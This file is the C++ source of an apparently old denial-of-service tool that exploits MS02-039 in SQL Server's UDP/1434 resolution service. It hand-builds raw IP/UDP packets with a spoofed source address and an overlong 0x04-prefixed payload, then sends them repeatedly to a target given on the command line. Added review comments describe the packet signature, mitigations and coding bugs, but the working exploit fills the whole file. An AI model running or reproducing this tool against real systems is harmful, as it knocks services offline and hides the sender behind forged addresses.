
📄 sqloverflowdos代码.cpp

////////////////////////////////////////////////////////////
//                                                   
// SQL Overflow dos tool
//
// Reference: MS02-039
//
// Author: refdom
// Email: refdom@263.net
// Homepage: www.opengram.com
//
////////////////////////////////////////////////////////////

#include <string.h>
#include <stdio.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>

#pragma comment(lib,"ws2_32.lib")

// UDP source port written into the hand-built header; 53 is the well-known DNS port.
// NOTE(review): presumably chosen so the datagram resembles DNS traffic. A stateless
// filter that admits anything with source port 53 would not stop it, so filtering
// should key on the destination port and on connection state instead.
#define SOURCE_PORT 53
// UDP destination port; 1434 is the SQL Server Resolution Service port that MS02-039
// concerns. Hosts that do not need this service reachable from untrusted networks
// should have UDP/1434 blocked at the perimeter.
#define DEST_PORT 1434

// IPv4 header layout (no options). The code relies on the compiler adding no
// padding; every member here is naturally aligned, so that presumably holds.
typedef struct ip_hdr			// IP header definition
{
	unsigned char h_verlen;			// IP version (high 4 bits) and header length in 32-bit words (low 4 bits), as Sendudp fills it
	unsigned char tos;				// 8-bit type of service (TOS)
	unsigned short total_len;		// 16-bit total length in bytes
	unsigned short ident;			// 16-bit identification
	unsigned short frag_and_flags;	// 3-bit flags (the remaining bits of this 16-bit field are the fragment offset)
	unsigned char ttl;				// 8-bit time to live (TTL)
	unsigned char proto;			// 8-bit protocol (TCP, UDP or other)
	unsigned short checksum;		// 16-bit IP header checksum
	unsigned int sourceIP;			// 32-bit source IP address
	unsigned int destIP;			// 32-bit destination IP address
}IP_HEADER;

// TCP pseudo-header. This declares a global object named psd_header of an
// anonymous struct type; nothing else in this listing references it.
struct // TCP pseudo-header definition
{
	unsigned long saddr; // source address
	unsigned long daddr; // destination address
	char mbz;            // presumably the "must be zero" byte of the pseudo-header
	char ptcl; // protocol type
	unsigned short tcpl; // TCP length
}psd_header;

// TCP header layout. Not referenced elsewhere in this listing.
typedef struct tcp_hdr // TCP header definition
{
	USHORT th_sport; // 16-bit source port
	USHORT th_dport; // 16-bit destination port
	unsigned int th_seq; // 32-bit sequence number
	unsigned int th_ack; // 32-bit acknowledgement number
	unsigned char th_lenres; // 4-bit header length / 6 reserved bits
	unsigned char th_flag; // 6-bit flags
	USHORT th_win; // 16-bit window size
	USHORT th_sum; // 16-bit checksum
	USHORT th_urp; // 16-bit urgent data offset
}TCP_HEADER;

typedef struct udp_hdr			// UDP header
{
    unsigned short sourceport;       // source port (stored in network byte order by Sendudp)
    unsigned short destport;         // destination port (stored in network byte order by Sendudp)
    unsigned short udp_length;       // length of UDP header plus payload, in bytes
    unsigned short udp_checksum;     // checksum over pseudo-header, UDP header and payload
} UDP_HEADER;

// checksum: helper that computes the 16-bit one's-complement Internet checksum.
//   buffer - start of the data, read as a sequence of 16-bit words
//   size   - number of bytes to cover; an odd trailing byte is added on its own
// Returns the complement of the folded sum.
USHORT checksum(USHORT *buffer, int size)
{
	unsigned long sum = 0;
	const USHORT *word = buffer;
	int remaining = size;

	// Accumulate whole 16-bit words.
	for (; remaining > 1; remaining -= sizeof(USHORT))
	{
		sum += *word;
		++word;
	}

	// One byte left over when the length is odd.
	if (remaining != 0)
	{
		sum += *(const UCHAR *)word;
	}

	// Fold the carries out of the upper half back into the low 16 bits.
	sum = (sum & 0xffff) + (sum >> 16);
	sum += (sum >> 16);

	return (USHORT)(~sum);
}

// Prints the program banner and the command-line synopsis to stdout.
void Usage()
{
	// Banner lines, emitted verbatim and in order.
	static const char *const kBanner[] = {
		"******************************************\n",
		"SQLOverFlowDOS(MS02-039)\n",
		"\t Written by Refdom\n",
		"\t Email: refdom@263.net\n",
		"\t Homepage: www.opengram.com\n",
		"Useage: SQLDOS.exe Fake_ip Target_ip \n",
		"*******************************************\n",
	};
	const int lineCount = (int)(sizeof(kBanner) / sizeof(kBanner[0]));

	for (int idx = 0; idx < lineCount; ++idx)
	{
		printf("%s", kBanner[idx]);
	}
}

// Sendudp: hand-builds one IPv4+UDP datagram and sends it five times, 500 ms
// apart, through a raw socket.
//   ulTargetIP - destination address, already in network byte order
//   ulFakeIP   - value written into the IP source-address field
//
// What the datagram looks like on the wire (useful for detection):
//   - UDP, source port SOURCE_PORT (53), destination port DEST_PORT (1434)
//   - 80-byte payload: 0x04, then 77 bytes of 'A', then two NUL bytes
//   - IP source address is whatever the caller supplied, so the source field
//     of a captured packet says nothing reliable about the sender
// A sensor can match UDP/1434 datagrams whose first payload byte is 0x04
// followed by an overlong run of non-NUL bytes. Mitigation is the vendor fix
// referenced by MS02-039, plus blocking UDP/1434 from untrusted networks and
// anti-spoofing (ingress/egress) filtering at the network edge.
void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP)
{

	SOCKET sock;
	SOCKADDR_IN addr_in;
	BOOL flag;
	char buf[80] = {0};
	IP_HEADER ipHeader;
	UDP_HEADER udpHeader;
	int iTotalSize, iUdpCheckSumSize, i, j;
	char sendbuf[256] = {0};
	char *ptr = NULL;

	// Fill all but the last two bytes with 'A', then overwrite the first byte
	// with 0x04; the final two bytes keep their zero initialisation.
	memset(buf, 'A', sizeof(buf) - 2);
	buf[0] = 0x04;

	// Raw socket: the process must be allowed to create one (normally an
	// administrative privilege on Windows).
	sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
	if (sock == INVALID_SOCKET)
	{
		printf("socket Error!\n");
		return;
	}

	// IP_HDRINCL tells the stack that the caller supplies the IP header itself.
	// NOTE(review): Windows XP SP2 and later client releases are documented to
	// drop raw-socket UDP datagrams whose source address is not local, so this
	// code is era-specific.
	flag = true;
	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
	{
		printf("setsockopt Error!\n");
		// NOTE(review): returns without closesocket(sock); the handle leaks here.
		return;
	}

	iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);

	// Version 4 in the high nibble; header length in 32-bit words in the low
	// nibble (assumes sizeof(unsigned long) == 4, as on Windows).
	ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
	ipHeader.tos=0;
	ipHeader.total_len=htons(iTotalSize);
	ipHeader.ident=0;
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_UDP;
	// The IP header checksum is left at zero; this function never computes it.
	ipHeader.checksum=0;
	ipHeader.sourceIP = ulFakeIP;
	ipHeader.destIP = ulTargetIP;

	udpHeader.sourceport = htons(SOURCE_PORT);
	udpHeader.destport = htons(DEST_PORT);
	udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));
	udpHeader.udp_checksum = 0;
	
		ptr = NULL;

		// Compute the UDP checksum.
		// sendbuf is first used as scratch space holding the pseudo-header
		// (source, destination, zero byte, protocol, UDP length) followed by
		// the UDP header and the payload.
		ZeroMemory(sendbuf,sizeof(sendbuf));
		ptr=sendbuf;
		iUdpCheckSumSize=0;
		udpHeader.udp_checksum = 0;

		memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));
		ptr +=sizeof(ipHeader.sourceIP);
		iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);

		memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));
		ptr +=sizeof(ipHeader.destIP);
		iUdpCheckSumSize +=sizeof(ipHeader.destIP);
		
		// Skip one byte: the pseudo-header's zero byte, already 0 from ZeroMemory.
		ptr++;
		iUdpCheckSumSize++;

		memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));
		ptr +=sizeof(ipHeader.proto);
		iUdpCheckSumSize +=sizeof(ipHeader.proto);

		memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));
		ptr +=sizeof(udpHeader.udp_length);
		iUdpCheckSumSize +=sizeof(udpHeader.udp_length);

		memcpy(ptr,&udpHeader,sizeof(udpHeader));
		ptr +=sizeof(udpHeader);
		iUdpCheckSumSize += sizeof(udpHeader);
		
		// Append the payload byte by byte (signed i is compared with an unsigned sizeof).
		for(i = 0; i < sizeof(buf); i++,ptr++)
			*ptr = buf[i];
		iUdpCheckSumSize += sizeof(buf);

		udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);

		// Reuse sendbuf for the datagram itself: IP header, UDP header, payload.
		// Both layouts fit in the 256-byte buffer given the sizes used above.
		ZeroMemory(sendbuf,sizeof(sendbuf));
		memcpy(sendbuf,&ipHeader,sizeof(ipHeader));
		memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));
		memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));

		addr_in.sin_family = AF_INET;
		addr_in.sin_port = htons(DEST_PORT);
		addr_in.sin_addr.S_un.S_addr = ulTargetIP ;

		printf("\n Starting send packet\n\t");

		// Five sends with a 500 ms pause before each one.
		for (j = 0; j < 5; j++)
		{
			Sleep(500);
			if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
			{
				printf("Send Error!\n");
				// NOTE(review): returns without closesocket(sock); the handle leaks here.
				return;
			}
			else
			{
				printf(".");
			}
		}

		printf("\n Send OK!\n");

	// Always true at this point, because the INVALID_SOCKET case returned earlier.
	if (sock != INVALID_SOCKET)
		closesocket(sock);
}

// Entry point: prints the banner, parses two dotted-quad addresses from the
// command line, initialises Winsock and calls Sendudp once.
// Returns 0 on every path shown here, including the failure paths.
int main(int argc, char* argv[])
{
	WSADATA		WSAData;
	unsigned long ulTargetIP, ulFakeIP;

	// The banner is printed unconditionally, before any argument checking.
	Usage();

	if (argc < 3)
	{
		// NOTE(review): false converts to 0, so a missing-argument exit is
		// indistinguishable from success for the calling shell.
		return false;
	}
	
	// argv[1] becomes the destination and argv[2] the source-address value.
	// NOTE(review): this is the reverse of the order printed by Usage(), and
	// neither inet_addr() result is checked against INADDR_NONE.
	ulTargetIP = inet_addr(argv[1]);
	ulFakeIP = inet_addr(argv[2]);
	
	// Requests Winsock version 2.0.
	if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
	{
		// NOTE(review): WSAStartup reports its error through its return value;
		// WSAGetLastError() is not meaningful when startup itself has failed.
		printf("WSAStartup error.Error:%d\n",WSAGetLastError());
		return false;
	}

	printf("DOS starting ...\n");

	Sendudp(ulTargetIP, ulFakeIP);

	// Printed even when Sendudp returned early on an error; it has no return value.
	printf("\nComplete!\n");


	WSACleanup();

	return 0;
}
